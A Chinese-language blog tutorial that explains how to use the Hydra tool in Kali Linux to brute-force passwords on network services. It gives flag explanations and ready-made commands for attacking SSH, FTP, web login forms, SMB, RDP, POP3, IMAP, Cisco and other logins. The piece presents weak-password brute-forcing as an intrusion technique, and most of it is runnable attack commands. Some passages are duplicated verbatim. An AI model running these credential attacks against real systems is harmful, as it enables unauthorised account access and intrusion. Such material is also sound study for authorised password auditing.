使用hydra对采用端口进行爆破

1.前言:

hydra中文名:九头蛇,这是一款相当强大的爆破工具,它基本支持了所有可爆破协议,而且容容错率非常好如果对开启端口的服务不清楚,请看我之前写的文章:http://msfconsole.com/cyld/。之前也有说过要介绍这款工具了。

2018年到2019年各个站点的脚本技术安全性越来越高,例如SQL,XSS可利用性几率较小,大多数的网站且拥有防火墙。但是由于运维的安全意识薄弱还是会存在弱口令这类漏洞,弱口令在渗透手法里算不得高明,但也是排行较高的渗透手法,简单,暴力。是它的代名词。对于端口的爆破,首先要有一个好的字典,这里主要介绍kali里面hydra的爆破,不过能不能爆破成功还是需要你有一个好的字典。

2.准备工作:

Kali Linux
Hydar


3.语法解析:

hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE]] | [-C FILE]] [-e ns] [ -  o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [ -vV]服务器服务[OPT]hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE]] | [-C FILE]] [-e ns] [ -  o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [ -vV]服务器服务[OPT]

参数解析:

-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-M 指定目标列表文件一行一条
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-w TIME 设置最大超时的时间,单位秒,默认是30s
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)****

使用案例:

爆破 ssh:22 端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh

爆破 Ftp:21 端口命令(指定用户名为root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp

get方式提交,破解web登录(指定用户名为admin):
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:
hydra -l admin -P password.txt -s 80 ip http-post-form
"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:"

参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,

破解https:
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https

破解teamspeak:
hydra -l admin -P passworrd.txt -s 端口号 -vV 192.168.0.132 teamspeak

破解cisco:
hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable

破解smb:
hydra -l administrator -P password.txt 192.168.0.132 smb

破解pop3:
hydra -l root -P password.txt my.pop3.mail pop3

破解rdp(3389端口):
hydra -l administrator -P password.txt -V 192.168.0.132 rdp

破解http-proxy:
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132

破解imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN


每个密码安全研究都显示,最大的安全漏洞是密码.Hydra是一个平行登录破解程序,支持多种攻击协议。新模块易于添加,除此之外,它还具有灵活性和快速性。每个密码安全研究都显示,最大的安全漏洞是密码.Hydra是一个平行登录破解程序,支持多种攻击协议。新模块易于添加,除此之外,它还具有灵活性和快速性。

Hydra经过测试,可在Linux,Windows / Cygwin,Solaris 11,FreeBSD 8.1和OSX上进行编译,并在GPLv3下提供特殊的OpenSSL许可证扩展。这款工具对于社工型人来说能起到事半功倍的效果。

作者:龙狮
出处:msfconsole.com/cyld4/
版权说明:转发标明出处
关注我们:如果你喜欢我们的文章或我们的网站可以在文章最下方的输入框输入邮箱订阅,好文章将会第一时间推送

Show Comments

Get the latest posts delivered right to your inbox.